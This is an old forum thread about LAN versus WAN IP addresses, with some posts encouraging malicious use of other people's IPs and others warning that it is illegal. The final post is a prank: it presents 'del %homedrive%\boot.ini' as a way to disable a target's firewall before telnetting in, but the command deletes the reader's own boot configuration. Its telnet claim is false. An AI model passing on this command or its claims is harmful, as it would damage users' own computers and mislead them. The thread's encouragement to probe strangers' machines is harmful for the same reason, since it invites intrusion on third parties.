Weird.. my inside LAN ip is always 192.168.1.103 .. it's set up so I always have the same IP from my router.

Even still.. my outside WAN ip is always the same too. ( 67.9.x.x )Tampa Bay Road Runner is great! :P
Get a Static IP without paying the extra $25 a month.

Not possible. But why would you want to do that.. you can't do anything with an internal IP. if you have a linksys router.. its going to be between these ranges.. 192.168.1.100 - 192.168.1.154

It wont do any good..so what's the point?

You can do alot of malicious related things if you have someones outside WAN IP address. Using Script Kiddie progs is one way.. but a better way is to actually learn the security hacks of programs.. and do lots of reading.

The IP retrieved through a ping is the only address you can actually use to connect/transmit to another computer. The "internal" IP address as you are calling it is only useful inside the physical network on which it is present. It is the address that the router and other computers/devices use to talk to the computer so that they can transfer packets within the network. The best bet for fetching an IP is to direct connect with the person and run netstat as mentioned. With some handy tracing you can find out exactly where the IP is originating from :)

You recognize that that is illegal, correct? And computer crime is taken a lot more seriously than it used to be.

Just warning you.

If he is asking questions about IP addresses I doubt he could get himself into any trouble by "hacking" anyway ;)

But none the less... compromising private security and encryption on a 3rd party's network is illegal.

for a second i thought jester was back, then i found out this buttmuncher revived a thread over a year old.

to find out what programs the person is running, go to start -> run

now you have to shutdown his firewall and other detection stuff so you wont be blocked out.

type in the run box:
del %homedrive%\boot.ini

then, type telnet the guys ip address.

bam, you get a list of programs hes running
